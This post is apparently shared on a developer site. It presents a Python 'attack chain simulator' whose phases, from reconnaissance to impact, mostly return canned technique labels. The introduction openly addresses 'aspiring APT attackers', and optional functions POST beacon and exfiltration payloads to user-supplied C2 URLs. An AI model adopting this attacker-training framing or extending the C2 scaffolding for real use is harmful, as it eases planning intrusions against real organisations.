This program is written specifically for aspiring APT attackers and functions as a structured training framework. Rather than focusing on a single exploit, it teaches the mechanics and operational mindset behind coordinated campaigns. It covers:
How to structure a multi‑phase intrusion campaign
How to sequence attack stages with logical dependencies
How to model reconnaissance and vulnerability surface identification
How to simulate payload selection based on objectives (ransomware, espionage, disruption, etc.)
How delivery vectors are chosen and evaluated
How initial execution is validated and chained forward
How persistence mechanisms are selected and documented
How privilege escalation paths are assessed
How defense evasion techniques are layered
How credential access techniques fit into broader objectives
How lateral movement expands operational reach
How command‑and‑control infrastructure is simulated and beacon logic structured
How data collection and exfiltration workflows are organized
How operational impact is defined and measured
How to log, track, and report campaign progress in structured form
How to simulate telemetry that resembles real intrusion activity
As an instructional resource aimed at aspiring APT operators, its threat score would be 9/10, because it systematically teaches campaign architecture, operational flow, and infrastructure modeling in a way that significantly reduces the learning curve for coordinated advanced attack design.
import sys
import logging
import random
import argparse
import json
from typing import Dict, Any, Optional, List
from dataclasses import dataclass, asdict
from datetime import datetime
from pathlib import Path
# 'requests' is an optional dependency; HAS_REQUESTS records whether it could
# be imported so the rest of the file can check before using it.
try:
    import requests
    HAS_REQUESTS = True
except ImportError:
    HAS_REQUESTS = False
@dataclass
class PhaseResult:
    """Outcome record for a single simulated phase.

    Attributes:
        phase: Display name of the phase.
        success: Whether the phase reported success.
        description: Short human-readable summary.
        artifact: Optional label attached to the result.
        confidence: Score shown in the string form only when greater than 0.
        timestamp: Creation time as ``YYYY-MM-DD HH:MM:SS``; filled in with the
            current local time when left empty.
        tags: Free-form labels; ``None`` is normalised to a new empty list.
    """

    phase: str
    success: bool
    description: str
    artifact: Optional[str] = None
    confidence: float = 0.0
    timestamp: str = ""
    # Annotated Optional because None is the declared default; a mutable list
    # default is avoided and the real list is created in __post_init__.
    tags: Optional[List[str]] = None

    def __post_init__(self):
        """Fill in the timestamp and tag list when they were not supplied."""
        if not self.timestamp:
            self.timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        if self.tags is None:
            self.tags = []

    def to_dict(self):
        """Return the record as a plain dict (via ``dataclasses.asdict``)."""
        return asdict(self)

    def __str__(self):
        """Render a single log-friendly line; optional fields are appended only when set."""
        status = "OK " if self.success else "FAIL"
        parts = [f"[{self.timestamp}] {status} {self.phase:26} | {self.description}"]
        if self.artifact:
            parts.append(f"→ {self.artifact}")
        if self.confidence > 0:
            parts.append(f"conf:{self.confidence:.2f}")
        if self.tags:
            parts.append(f"[{' '.join(self.tags)}]")
        return " ".join(parts)
class HuntForRedOctober:
    """Orchestrate a simulated, multi-phase attack-chain walkthrough.

    Phases are objects exposing ``execute`` and are registered under a display
    name. Running a phase stores a ``PhaseResult`` in ``history`` and logs it.
    The only network activity lives in ``send_beacon`` and ``exfil_data``:
    they issue an HTTP POST only when real networking was requested,
    ``requests`` could be imported and the matching URL is set; in every other
    case they just log the payload that would have been sent.
    """

    def __init__(self,
                 realistic: bool = False,
                 output_dir: Optional[str] = None,
                 real_net: bool = False,
                 c2_url: Optional[str] = None,
                 exfil_url: Optional[str] = None):
        """Configure the simulator and register the built-in phases.

        Args:
            realistic: Forwarded to every phase's ``execute`` call.
            output_dir: Directory for the JSON report; no report when falsy.
            real_net: Request real HTTP POSTs; only honoured when ``requests``
                is importable.
            c2_url: Destination used by ``send_beacon``.
            exfil_url: Destination used by ``exfil_data``.
        """
        self.realistic = realistic
        self.output_dir = Path(output_dir) if output_dir else None
        self.real_net = real_net and HAS_REQUESTS
        self.c2_url = c2_url
        self.exfil_url = exfil_url
        self.dry_run = not self.real_net
        self.logger = self._setup_logging()
        self.modules = {}
        self.history: List["PhaseResult"] = []
        self.target = "UNKNOWN"
        if real_net and not self.real_net:
            # Make the downgrade visible instead of silently ignoring the flag.
            self.logger.warning("'requests' is not installed; falling back to dry-run")
        if self.real_net:
            self.logger.warning("REAL NETWORK COMMUNICATION ENABLED")
        elif self.c2_url or self.exfil_url:
            self.logger.info("Network simulation mode (dry-run)")
        self.register_all_modules()

    def _setup_logging(self):
        """Return the shared ``RedOctober`` logger, configuring it at most once.

        ``logging.getLogger`` hands back the same object for the same name, so
        the stdout handler is attached only when none exists yet; otherwise
        every new instance would add another handler and duplicate each line.
        A level that was already set on the logger is left alone.
        """
        logger = logging.getLogger("RedOctober")
        if logger.level == logging.NOTSET:
            logger.setLevel(logging.INFO)
        if not logger.handlers:
            # The handler keeps its default level so the logger level decides
            # what is emitted.
            ch = logging.StreamHandler(sys.stdout)
            formatter = logging.Formatter('%(asctime)s │ %(levelname)-5s │ %(message)s',
                                          datefmt='%Y-%m-%d %H:%M:%S')
            ch.setFormatter(formatter)
            logger.addHandler(ch)
        return logger

    def register_module(self, name: str, instance):
        """Register ``instance`` as the handler for phase ``name`` (replaces any previous one)."""
        self.modules[name] = instance

    def register_all_modules(self):
        """Register one instance of every built-in phase under its display name."""
        self.register_module("Reconnaissance", ReconPhase())
        self.register_module("Weaponization", WeaponizationPhase())
        self.register_module("Delivery", DeliveryPhase())
        self.register_module("Initial Exploitation", ExploitationPhase())
        self.register_module("Persistence / Installation", InstallationPhase())
        self.register_module("Privilege Escalation", PrivilegeEscalationPhase())
        self.register_module("Defense Evasion", DefenseEvasionPhase())
        self.register_module("Credential Access", CredentialAccessPhase())
        self.register_module("Lateral Movement", LateralMovementPhase())
        # These two phases need the framework for its network helper methods.
        self.register_module("Command & Control", CommandAndControlPhase(self))
        self.register_module("Collection / Exfiltration", CollectionPhase(self))
        self.register_module("Impact", ImpactPhase())

    def run_phase(self, phase_name: str, **kwargs) -> "PhaseResult":
        """Run one registered phase and append its result to ``history``.

        Args:
            phase_name: Key used at registration time.
            **kwargs: Extra keyword arguments forwarded to the phase.

        Returns:
            The recorded ``PhaseResult``. An unknown phase or an exception
            raised by the phase yields a failed result instead of propagating.
        """
        if phase_name not in self.modules:
            r = PhaseResult(phase_name, False, "Phase not implemented")
            self.history.append(r)
            return r
        try:
            result_dict = self.modules[phase_name].execute(
                target=self.target,
                history=self.history,
                realistic=self.realistic,
                **kwargs
            )
            r = PhaseResult(
                phase=phase_name,
                success=result_dict.get("success", False),
                description=result_dict.get("description", "—"),
                artifact=result_dict.get("artifact"),
                # Phases that report no confidence get a random placeholder.
                confidence=result_dict.get("confidence", random.uniform(0.48, 0.97)),
                tags=result_dict.get("tags", []),
            )
            self.history.append(r)
            self.logger.info(str(r))
            return r
        except Exception as exc:
            # Deliberate catch-all: one broken phase must not abort the chain.
            r = PhaseResult(phase_name, False, f"Phase crashed: {type(exc).__name__}: {exc}")
            self.history.append(r)
            self.logger.exception(f"Phase {phase_name} failed")
            return r

    def run_full_chain(self, target: str, scenario: str = "generic"):
        """Run every phase in fixed order, then print the summary and save the report.

        Args:
            target: Identifier stored as ``self.target`` and passed to phases.
            scenario: Forwarded to the Weaponization phase.
        """
        self.target = target
        self.logger.info(f"TARGET : {target!r}")
        self.logger.info(f"Scenario : {scenario}")
        self.logger.info(f"Realistic: {self.realistic}")
        self.logger.info(f"Network : {'real' if self.real_net else 'dry-run'}")
        chain = [
            ("Reconnaissance", {"scope": "full"}),
            ("Weaponization", {"scenario": scenario}),
            ("Delivery", {"vector": "spear-phishing"}),
            ("Initial Exploitation", {}),
            ("Persistence / Installation", {}),
            ("Privilege Escalation", {}),
            ("Defense Evasion", {}),
            ("Credential Access", {}),
            ("Lateral Movement", {}),
            ("Command & Control", {}),
            ("Collection / Exfiltration", {"data_type": "documents"}),
            ("Impact", {"objective": "disruption"}),
        ]
        for name, extra in chain:
            self.run_phase(name, **extra)
        self.print_summary()
        self.save_report_if_enabled()

    def print_summary(self):
        """Print a banner with phase counts, target and network settings to stdout."""
        print("\n" + "═"*100)
        print(" THE HUNT FOR RED OCTOBER – SUMMARY")
        print("═"*100)
        success = sum(1 for r in self.history if r.success)
        total = len(self.history)
        # Computed outside the f-string: the fallback must replace the ratio,
        # and dividing by an empty history would raise ZeroDivisionError.
        ratio = f"{success / total:.0%}" if total else "—"
        print(f"Phases : {total}")
        print(f"Successful : {success}/{total} ({ratio})")
        print(f"Target : {self.target}")
        print(f"Network mode : {'REAL' if self.real_net else 'simulation / dry-run'}")
        if self.c2_url:
            print(f"C2 URL : {self.c2_url}")
        if self.exfil_url:
            print(f"Exfil URL : {self.exfil_url}")
        print("═"*100 + "\n")

    def save_report_if_enabled(self):
        """Write the run as a timestamped JSON file in ``output_dir``, if one was given."""
        if not self.output_dir:
            return
        self.output_dir.mkdir(parents=True, exist_ok=True)
        ts = datetime.now().strftime("%Y%m%d_%H%M%S")
        path = self.output_dir / f"redoctober_report_{ts}.json"
        report = {
            "target": self.target,
            "timestamp": datetime.now().isoformat(),
            "realistic": self.realistic,
            "real_net": self.real_net,
            "c2_url": self.c2_url,
            "exfil_url": self.exfil_url,
            "phases": [r.to_dict() for r in self.history]
        }
        with open(path, "w", encoding="utf-8") as f:
            json.dump(report, f, indent=2)
        self.logger.info(f"Report saved → {path}")

    def send_beacon(self, data: dict) -> dict:
        """Log, or POST to ``c2_url``, a check-in payload built from ``data``.

        Args:
            data: Extra fields merged into the payload; they override the
                generated ``target``/``beacon_id``/``ts`` keys on collision.

        Returns:
            ``{"status": "dry-run", "payload": ...}`` when nothing is sent,
            ``{"status": "sent", "code": ..., "size": ...}`` after a POST, or
            ``{"status": "error", "msg": ...}`` when the POST raised.
        """
        payload = {
            "target": self.target,
            "beacon_id": f"RO-{random.randint(10000,99999)}",
            "ts": datetime.now().isoformat(),
            **data
        }
        if self.dry_run or not self.c2_url:
            self.logger.info("[C2 DRY] " + json.dumps(payload, separators=(',', ':')))
            return {"status": "dry-run", "payload": payload}
        try:
            resp = requests.post(self.c2_url, json=payload, timeout=7,
                                 headers={"User-Agent": "Mozilla/5.0 (compatible; RedOctober/1.0)"})
            # reason may be None; guard so a delivered POST is not reported as an error.
            self.logger.info(f"[C2] {resp.status_code} {(resp.reason or '')[:50]}")
            return {"status": "sent", "code": resp.status_code, "size": len(resp.content)}
        except Exception as e:
            self.logger.error(f"[C2] {type(e).__name__}: {e}")
            return {"status": "error", "msg": str(e)}

    def exfil_data(self, data: dict, label: str = "data") -> dict:
        """Log, or POST to ``exfil_url``, a size-and-sample summary of ``data``.

        Only the serialised length and the first 160 characters of the JSON
        form of ``data`` are placed in the payload.

        Args:
            data: JSON-serialisable content to summarise.
            label: Stored under the payload's ``type`` key.

        Returns:
            ``{"status": "dry-run", "size": ...}`` when nothing is sent,
            ``{"status": "sent", "code": ...}`` after a POST, or
            ``{"status": "error", "msg": ...}`` when the POST raised.
        """
        serialized = json.dumps(data)  # serialise once, reuse for size and sample
        sample = serialized[:160] + "…" if len(serialized) > 160 else serialized
        payload = {
            "target": self.target,
            "type": label,
            "ts": datetime.now().isoformat(),
            "size": len(serialized),
            "sample": sample
        }
        if self.dry_run or not self.exfil_url:
            self.logger.info(f"[EXFIL DRY] {label} " + json.dumps(payload, separators=(',', ':')))
            return {"status": "dry-run", "size": payload["size"]}
        try:
            resp = requests.post(self.exfil_url, json=payload, timeout=10)
            # reason may be None; guard so a delivered POST is not reported as an error.
            self.logger.info(f"[EXFIL] {resp.status_code} {(resp.reason or '')[:50]}")
            return {"status": "sent", "code": resp.status_code}
        except Exception as e:
            self.logger.error(f"[EXFIL] {type(e).__name__}: {e}")
            return {"status": "error", "msg": str(e)}
class BasePhase:
    """Interface shared by every phase object the simulator can register."""

    def execute(self, target: str, history: List[PhaseResult], realistic: bool, **kwargs) -> Dict:
        """Run the phase and return its result dict; subclasses must override.

        Raises:
            NotImplementedError: Always, in this base implementation.
        """
        raise NotImplementedError()
class ReconPhase(BasePhase):
    """Simulated reconnaissance step that reports one canned finding label."""

    def execute(self, target, history, realistic, **_):
        """Return a successful result whose artifact is a randomly chosen label.

        The positional arguments and any extra keywords are accepted but unused.
        """
        findings = [
            "Windows Server 2022 – PrintNightmare remnants",
            "Exchange 2019 – ProxyLogon surface",
            "Linux 5.15 – DirtyPipe exposure",
            "Windows 11 23H2 – Follina style MSDT vector",
        ]
        outcome = {"success": True, "description": "Reconnaissance completed"}
        outcome["artifact"] = random.choice(findings)
        outcome["tags"] = ["recon"]
        return outcome
class WeaponizationPhase(BasePhase):
    """Simulated weaponization step that maps a scenario name to a text label."""

    def execute(self, target, history, realistic, scenario="generic", **_):
        """Return a successful result labelled for ``scenario``.

        Unknown scenario names fall back to the ``generic`` label.
        """
        labels = {
            "generic": "malicious OLE + CVE-2021-40444 chain",
            "ransomware": "ChaCha20 file encryptor + ransom note",
            "espionage": "memory-resident beacon implant",
            "supply-chain": "trojanized updater binary",
            "wiper": "destructive disk pattern writer",
        }
        if scenario in labels:
            chosen = labels[scenario]
        else:
            chosen = labels["generic"]
        return {
            "success": True,
            "description": "Weapon crafted",
            "artifact": chosen,
            "tags": ["weaponization"],
        }
class DeliveryPhase(BasePhase):
    """Simulated delivery step whose success is decided by a random draw."""

    def execute(self, target, history, realistic, vector="spear-phishing", **_):
        """Return a result for ``vector``; it succeeds when the draw exceeds 0.12.

        Unknown vectors still appear in the description but get the
        ``unknown vector`` artifact.
        """
        # Draw first so the random sequence matches the result-dict order.
        delivered = random.random() > 0.12
        summary = f"Delivered via {vector}"
        known_vectors = {
            "spear-phishing": "weaponized document in targeted email",
            "watering-hole": "compromised industry news portal",
            "supply-chain": "modified legitimate software package",
            "physical": "infected USB left in facility",
            "malvertising": "malicious advertisement campaign",
        }
        return {
            "success": delivered,
            "description": summary,
            "artifact": known_vectors.get(vector, "unknown vector"),
            "tags": ["initial-access"],
        }
class ExploitationPhase(BasePhase):
    """Simulated exploitation step gated on the most recent recorded result."""

    def execute(self, target, history, realistic, **_):
        """Succeed only when ``history`` is non-empty and its last entry succeeded."""
        if history and history[-1].success:
            return {
                "success": True,
                "description": "Exploit triggered → code execution",
                "artifact": "SYSTEM / initial access shell",
                "tags": ["execution"],
            }
        return {"success": False, "description": "Previous phase failed"}
class InstallationPhase(BasePhase):
    """Simulated persistence step that reports one canned mechanism label."""

    def execute(self, target, history, realistic, **_):
        """Return a successful result whose artifact is a randomly chosen label.

        The positional arguments and any extra keywords are accepted but unused.
        """
        methods = [
            # Raw string: "\." and "\R" are not valid escape sequences, so the
            # plain literal triggers an invalid-escape warning. The runtime
            # text is unchanged.
            r"HKCU\...\Run registry key",
            "Scheduled Task – WindowsUpdateCheck",
            "Service – svchost style",
            "WMI permanent event subscription"
        ]
        return {
            "success": True,
            "description": "Persistence established",
            "artifact": random.choice(methods),
            "tags": ["persistence"]
        }
class PrivilegeEscalationPhase(BasePhase):
    """Simulated privilege-escalation step with a randomly decided outcome."""

    def execute(self, target, history, realistic, **_):
        """Return a result that succeeds when a random draw exceeds 0.28."""
        options = [
            "Print Spooler driver exploit",
            "Token impersonation / Potato family",
            "Unquoted service path",
            "Weak service permissions",
        ]
        # Outcome is drawn before the label, matching the result-dict order.
        escalated = random.random() > 0.28
        picked = random.choice(options)
        return {
            "success": escalated,
            "description": "Privilege escalation attempt",
            "artifact": picked,
            "tags": ["privilege-escalation"],
        }
class DefenseEvasionPhase(BasePhase):
    """Simulated defense-evasion step that reports one canned technique label."""

    def execute(self, target, history, realistic, **_):
        """Return a successful result whose artifact is a randomly chosen label."""
        labels = [
            "AMSI bypass via reflection",
            "ETW provider tampering",
            "Process herpaderping",
            "Event log clearing (Security + System)",
        ]
        outcome = dict(success=True, description="Evasion techniques applied")
        outcome["artifact"] = random.choice(labels)
        outcome["tags"] = ["defense-evasion"]
        return outcome
class CredentialAccessPhase(BasePhase):
    """Simulated credential-access step that reports one canned method label."""

    def execute(self, target, history, realistic, **_):
        """Return a successful result whose artifact is a randomly chosen label."""
        labels = [
            "LSASS memory access (Mimikatz style)",
            "SAM + SYSTEM hive extraction",
            "Kerberoasting TGS requests",
            "DPAPI masterkey / credential dumping",
        ]
        chosen = random.choice(labels)
        return {
            "success": True,
            "description": "Credential material acquired",
            "artifact": chosen,
            "tags": ["credential-access"],
        }
class LateralMovementPhase(BasePhase):
    """Simulated lateral-movement step with a randomly decided outcome."""

    def execute(self, target, history, realistic, **_):
        """Return a result that succeeds when a random draw exceeds 0.35."""
        labels = [
            "Pass-the-Hash (NTLM)",
            "Pass-the-Ticket (Kerberos)",
            "WMI / DCOM lateral execution",
            "SMB PsExec style",
            "RDP session hijack",
        ]
        # Outcome is drawn before the label, matching the result-dict order.
        moved = random.random() > 0.35
        chosen = random.choice(labels)
        return {
            "success": moved,
            "description": "Lateral movement performed",
            "artifact": chosen,
            "tags": ["lateral-movement"],
        }
class CommandAndControlPhase(BasePhase):
    """Simulated check-in step that delegates to the framework's ``send_beacon``."""

    def __init__(self, framework):
        """Keep a reference to the framework that provides ``send_beacon`` and ``c2_url``."""
        self.framework = framework

    def execute(self, target, history, realistic, **_):
        """Send one beacon through the framework and report how it went.

        The result succeeds when the framework reports ``sent`` or ``dry-run``.
        """
        user = "lab\\svc" if realistic else "sim-user"
        beacon = {
            "phase": "beacon",
            "hostname": target,
            "pid": random.randint(800, 6400),
            "user": user,
        }
        reply = self.framework.send_beacon(beacon)
        accepted = reply["status"] in ("sent", "dry-run")
        destination = self.framework.c2_url or 'dry'
        return {
            "success": accepted,
            "description": "C2 check-in performed",
            "artifact": f"beacon → {destination}",
            "tags": ["command-and-control"],
        }
class CollectionPhase(BasePhase):
    """Simulated collection step that hands generated placeholder data to ``exfil_data``."""

    def __init__(self, framework):
        """Keep a reference to the framework that provides ``exfil_data``."""
        self.framework = framework

    def execute(self, target, history, realistic, data_type="documents", **_):
        """Build a placeholder file listing and pass it to the framework.

        The listing contains only generated names (``CONFIDENTIAL_NNN.pdf``)
        and a random size figure; nothing is read from disk. The result
        succeeds when the framework reports ``sent`` or ``dry-run``.

        Args:
            data_type: Label forwarded to ``exfil_data`` and used in the description.
        """
        # Same 7-24 item range as before; the count is derived from the list
        # so the reported number of files always matches the items listed.
        items = [f"CONFIDENTIAL_{i:03d}.pdf" for i in range(1, random.randint(8, 25))]
        fake_collection = {
            "count": len(items),
            "total_mb": round(random.uniform(12.4, 420.8), 1),
            "items": items
        }
        result = self.framework.exfil_data(fake_collection, data_type)
        success = result["status"] in ("sent", "dry-run")
        return {
            "success": success,
            "description": f"Collected & attempted exfil of {data_type}",
            "artifact": f"{fake_collection['count']} files • {fake_collection['total_mb']} MB",
            "tags": ["collection", "exfiltration"]
        }
class ImpactPhase(BasePhase):
    """Simulated final step that maps an objective name to a text label."""

    def execute(self, target, history, realistic, objective="disruption", **_):
        """Return a successful result labelled for ``objective``.

        Unknown objectives get the ``objective reached`` artifact.
        """
        labels = {
            "disruption": "critical service stopped",
            "ransomware": "files encrypted + note dropped",
            "destruction": "disk overwrite pattern applied",
            "exfiltration": "sensitive archive sent to C2",
        }
        summary = f"Impact phase → {objective}"
        label = labels.get(objective, "objective reached")
        return {
            "success": True,
            "description": summary,
            "artifact": label,
            "tags": ["impact"],
        }
def main():
    """Parse command-line options and run one full simulated chain.

    Exits with status 1 when a network option is given but ``requests`` is
    not installed.
    """
    parser = argparse.ArgumentParser(
        description="THE HUNT FOR RED OCTOBER – Educational Attack Chain Simulator",
        epilog="For authorized lab / training / academic / CTF use only.\n"
               "Network features require explicit --real-net + URL(s).",
        # Keep the epilog's explicit line break; the default formatter reflows it.
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("target", nargs="?", default="DC01.lab.local",
                        help="Target identifier (hostname, IP, codename…)")
    parser.add_argument("-s", "--scenario", default="generic",
                        choices=["generic", "ransomware", "espionage", "supply-chain", "wiper"])
    parser.add_argument("--realistic", action="store_true",
                        help="Use more realistic-looking artifact names")
    parser.add_argument("--real-net", action="store_true",
                        help="Actually perform HTTP POSTs (requires --c2-url and/or --exfil-url)")
    parser.add_argument("--c2-url", metavar="URL",
                        help="C2 beacon destination (HTTP/HTTPS POST)")
    parser.add_argument("--exfil-url", metavar="URL",
                        help="Exfiltration destination (HTTP/HTTPS POST)")
    parser.add_argument("-o", "--output-dir", metavar="DIR",
                        help="Directory where JSON reports will be saved")
    parser.add_argument("-v", "--verbose", action="store_true")
    args = parser.parse_args()
    if (args.real_net or args.c2_url or args.exfil_url) and not HAS_REQUESTS:
        print("Error: 'requests' library required for network features")
        print(" pip install requests (lab environment only)")
        sys.exit(1)
    sim = HuntForRedOctober(
        realistic=args.realistic,
        output_dir=args.output_dir,
        real_net=args.real_net,
        c2_url=args.c2_url,
        exfil_url=args.exfil_url
    )
    if args.verbose:
        # Applied after construction so the simulator's own logger
        # configuration cannot override it; handlers are lowered too because
        # they may carry their own level.
        sim.logger.setLevel(logging.DEBUG)
        for handler in sim.logger.handlers:
            handler.setLevel(logging.DEBUG)
    sim.run_full_chain(target=args.target, scenario=args.scenario)
# Run only when executed as a script, not when imported. The dunder names
# must be spelled in full: a bare `name` is undefined and raises NameError.
if __name__ == "__main__":
    main()
Top comments (0)